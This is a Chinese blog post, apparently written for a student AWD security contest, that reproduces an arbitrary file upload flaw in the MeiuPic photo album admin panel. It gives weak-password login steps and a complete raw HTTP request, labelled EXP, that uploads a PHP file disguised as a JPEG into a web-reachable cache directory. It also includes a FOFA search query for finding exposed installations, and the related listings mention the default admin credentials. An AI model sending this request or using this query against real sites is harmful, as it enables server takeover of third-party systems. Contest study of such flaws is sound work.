MeiuPic美优相册后台任意文件上传漏洞-0day复现过程

最新推荐文章于 2024-06-03 09:55:07 发布
最新推荐文章于 2024-06-03 09:55:07 发布
阅读量220 收藏
点赞数 3
文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mo2901600657/article/details/138810545
版权

湖北省大学生信创大赛网络安全赛道-awd赛题

1.弱口令登陆网站后台

2.在相册中的图片管理选择添加图片

3.选择一个图片马上传,点击开始上传,burp抓包

4.burp修改数据包(修改处和修改内容如下)

http://******.com/data/cache/tmp/1.php

EXP:

POST /admin/?app=base&m=upfile&a=uploadprocess HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------297537400521561729203922333825
Content-Length: 575
Origin: http://*****.com
Connection: close
Referer: http://******.com/admin/?app=album&m=upload&aid=&winid=win4723
Cookie: PHPSESSID=7u3oocuig6vf8nfgbn7th2b6ji; MEIU_AUTH=ac57moXw8jxgBzhN2Biv5zC3M5WVUmYcG3xEIa5rJ43mFvHP0UauPmQZK%2BgbMUzBaSiAWrzAZ0a7D4s3iFwL7pQZEA9g

-----------------------------297537400521561729203922333825
Content-Disposition: form-data; name="name"

1.php
-----------------------------297537400521561729203922333825
Content-Disposition: form-data; name="chunk"

0
-----------------------------297537400521561729203922333825
Content-Disposition: form-data; name="chunks"

1
-----------------------------297537400521561729203922333825
Content-Disposition: form-data; name="file"; filename="a.jpg"
Content-Type: image/jpeg

<?php phpinfo();?>
-----------------------------297537400521561729203922333825--

fofa:"发现-美优相册"

奫M
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php相册源码_为了私藏点小图图,搭个开源相册
weixin_39791322的博客
11-23 2572
背景CentOS上搭建 meiupic 图床(一个PHP写的开源相册),之前也搭建过 PHP 的 LNMP 环境,但是那是很长时间的事了,并且当时使用的是 Ubuntu Server 版本服务器。本以为很快就搭建 OK,却还是折腾了一晚上,真是惭愧...一、CentOS配置网络本是一件多简单的事,不就是在配置文件/etc/sysconfig/network-scripts/ifcfg-eth0里写...
美优相册管理系统meiupic 2.0 r202
03-26
MeiuPic美优相册管理系统是一款简单、易用的在线相册系统,系统内置主题拥有五种色调的预置风格,支持强大的插件扩展功能,采用视窗化的照片管理方式、快捷强大的照片上传方式,还具有相片搜索、回收站、评论及RSS订阅等其他功能。 MeiuPic2.0正式发布! 1.全新的UI,底层全部重构 2.支持多插件,多风格 3.默认风格预置了5种色调 4.可对图片相册评论 5.四种相册权限支持 6.支持标签分类功能 7.支持回收站功能 8.复制地址到剪贴板 9.支持超大文件上传及批量上传 10.客户端预处理 11.强大的水印设置,支持图片水印和文字水印 12.多语言支持 13.多种排序方式 14.搜索功能 15.Exif信息 16.幻灯片模式 17.全面支持Sqlite2、Sqlite3和Mysql 18.程序仅400多K大小
2023最新MeiuPic美优相册管理系统源码3.0版+UI简约大气
erhtwd的博客
03-19 580
1. 导入sql数据库文件2. 修改数据库配置文件路径 /data/config.php3. 伪静态设置为:if (!break;
MeiuPic 美优相册管理系统 v2.2.0
10-25
MeiuPic 2.2.0正式发布!2.2.0 新加入的功能:1. 加入全新的风格"Sense"2. 加入登录验证码和评论验证码3. 模板功能增强,加入新的模板标签4. 增加扫描文件夹模式添加图片5. plupload升级到1.5.46. 加入设置默认排序及默认分页数7. 优化图片处理的类8. 允许图片按原名存放(不含中文时)9. 修复多个bug及安全问题功能简介:全新的UI,底层全部重构 支持多插件,多风格 默认风格预置了5种色调 可对图片相册评论 四种相册权限支持 支持标签分类功能 支持回收站功能 复制地址到剪贴板 支持超大文件上传及批量上传 客户端预处理 强大的水印设置,支持图片水印和文字水印 多语言支持 多种排序方式 搜索功能 Exif信息 幻灯片模式 全面支持Sqlite2、Sqlite3和Mysql 支持自动更新 无限级分类 自定义导航菜单 程序仅500多K大小
探秘MeiuPic 3.0:打造你的专属图虫式图片社区
最新发布
gitblog_00025的博客
06-03 328
探秘MeiuPic 3.0:打造你的专属图虫式图片社区 项目地址:https://gitcode.com/meiu/meiupic 项目介绍 MeiuPic 3.0 是一款全新的多用户相册系统,灵感来源于图虫和500px等知名图片分享社区。它提供了一站式的解决方案,帮助你轻松搭建属于自己的个性化图片分享平台,让每个用户都能展示他们的摄影才华与创意作品。 项目技术分析 MeiuPic 3.0 的...
MeiuPic美优相册管理系统网站源码v3.0
03-22
源码v3.0,一款简洁好用的多用户图片社区程序。 安装说明: 上传压缩包至网站根目录,修改数据库信息,data/config.php 导入数据库meiupic.sql 后台地址:http://xxx.com/admin 账号:admin密码:123456 <!--文章内容结束-->
美优相册管理系统meiupic 2.2.0.zip
05-27
美优相册管理系统meiupic是开源的单用户相册管理系统!支持Sqlite数据库和Mysql等多种数据库支持,即使再苛刻的空间都能够使用。麻雀虽小,五脏俱全。 美优相册管理系统meiupic 2.2.0 解决了以下问题: 1. 加入全新的风格"Sense" 2. 加入登录验证码和评论验证码 3. 模板功能增强,加入新的模板标签 4. 增加扫描文件夹模式添加图片 5. plupload升级到1.5.4 6. 加入设置默认排序及默认分页数 7. 优化图片处理的类 8. 允许图片按原名存放(不含中文时) 9. 修复多个bug及安全问题 功能介绍: 1.批量上传图片/普通上传模式切换 2.支持超大图片上传(需flash支持) 3.支持拖拽文件到待上传列表(需html5支持) 4.支持客户端预处理图片上传 5.设置相册封面 6.相册幻灯片方式展示( highslide ) 7.图片移动至相册 8.Windows视窗式的图片/相册重命名 9.将图片地址复制到剪贴板 10.将包含图片地址的Html代码复制到剪贴板 11.重新上传某张图片,不改变图片地址 12.基本的系统设置 13.简易快捷的安装方式 14.支持Sqlite,无需mysql也可使用 15.按需自动生成不同大小的图片(需apache rewrite支持) 16.图片批量删除,批量移动 17.添加水印功能 18.查看图片的EXIF信息 19.简洁漂亮的游客浏览界面 20.基于apache rewrite的图片防盗链
软件收集-相册系统
chenyinpi0131的博客
08-27 135
有很多漂亮的相册建站系统,根据demo效果和自己的需要,选择简单合适的即可。 MeiuPic相册系统 http://www.meiu.cn/ GalleryCMS https://github.com/bensonarts/GalleryCMS Piwigo http://cn.piwigo...
多款开源免费网络相册/相册系统源码推荐
热门推荐
初学者的专栏
07-01 1万+
Flickr和Picasa是目前互联网两家知名的免费照片储存、分享的网站。当然你也可以拥有一个类似的网站,笔者今天整理并推荐几款国内外开源的相册源码。 Gallery   Gallery 是国外一个免费开源的图库相册软件,基于 PHP 和 MySQL/PostgreSQL 等数据库。功能非常强大,有丰富的扩展可以下载,安装很简单,有很多插件可用。非常易于使用,包括一个配置向导,对于相片
PHP编程相册管理系统
编程浪子的博客
12-17 1055
源程序下载地址:本帖隐藏的内容meiupic.rar (309.67 KB, 下载次数: 0)12 分钟前 上传下载次数: 0 •全面支持Sqlite和Mysql两种数据库引擎•支持超大图片上传•相册可以设置公开或个人,个人相册登录后才可以看到•自动生成各种尺寸图片•图片批量管理简单防盗链功能•可查看图片EXIF信息•图片地址或HTML代码一键复制到剪贴板•支持客户端预处理图片上传•图片幻灯片方...
美优相册管理 系统 美优相册
01-20
美优相册管理系统 美优相册管理系统美优相册管理系统
美优相册管理系统源码v3.0版+前后端全开源源码
06-18
上传压缩包至网站根目录,修改数据库信息,data/config.php 导入数据库meiupic.sql 后台地址: http://xxx.com/admin 账号:admin 密码:123456
美优简单相册管理系统 v1.0版
03-26
美优相册管理系统 这是一个单用户的相册管理系统。 主要有以下功能: 1.批量上传图片/普通上传模式切换 2.支持超大图片上传(需flash支持) 3.支持拖拽文件到待上传列表(需html5支持) 4.支持客户端预处理图片上传 5.设置相册封面 6.相册幻灯片方式展示(highslide) 7.图片移动至相册 8.Windows视窗式的图片/相册重命名 9.将图片地址复制到剪贴板 10.将包含图片地址的Html代码复制到剪贴板 11.重新上传某张图片,不改变图片地址 12.基本的系统设置 13.简易快捷的安装方式 安装说明: 1.上传此目录至空间 2.执行http://url地址/install.php 3.删除install.php 申明: 使用此程序遇到的数据丢失或其他风险,概不负责。 GoogleCode: http://code.google.com/p/meiupic 我的Blog: http://blog.meiu.cn/
MeiuPic美优相册管理系统官方版v2.2.0
04-02
MeiuPic美优相册管理系统官方版v2.2.0 功能介绍: 系统内置主题拥有五种色调的预置风格,满足您各式各样的个人风格及心情,当然您也可以搭配出更加个性的风格。 如果这些还不能满足你的要求,更有简洁、时尚、酷炫...
基于PHP的MeiuPic美优相册管理系统源码.zip
08-27
MeiuPic美优相册管理系统是一款基于PHP语言开发的在线图片管理平台,旨在提供便捷、高效的照片上传、存储和分享功能。源码的发布对于开发者来说是一个宝贵的资源,可以用于学习PHP编程、Web开发以及数据库管理等多个...
php图片相册管理meiupic美优系统源码v3.0
01-19
美优相册管理系统是一款基于PHP开发的图片相册管理系统,具有简单易用、功能强大的特点。该系统提供了丰富的功能,包括用户注册登录、相册创建、图片上传、图片管理相册分享等。 用户可以通过注册登录功能进行系统的使用,注册时需要输入用户名和密码,并通过邮箱验证进行注册。用户可以创建自己的相册,并上传照片到相册中。系统支持各种图片格式的上传,用户可以根据自己的需求进行灵活选择。 系统的图片管理功能非常方便,用户可以批量上传、删除和编辑图片。用户可以对图片进行重命名、描述和分类,方便地进行管理和查找。同时,系统还提供了相册分享功能,用户可以将自己的相册分享给其他用户或朋友,方便他们欣赏和评论。 美优相册管理系统采用了现代化的设计风格,界面简洁美观,用户操作友好。系统还支持响应式布局,适配不同的设备和屏幕尺寸,方便用户在手机、平板等多种终端上访问和使用。 此外,系统还具有较强的安全性,采用了密码加密和防止恶意注入等多项安全措施,确保用户数据的安全性和系统的稳定性。 总之,美优相册管理系统是一款功能强大、操作简单的PHP图片相册管理系统,适用于个人或团队使用,为用户提供了便捷的图片管理和分享服务。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值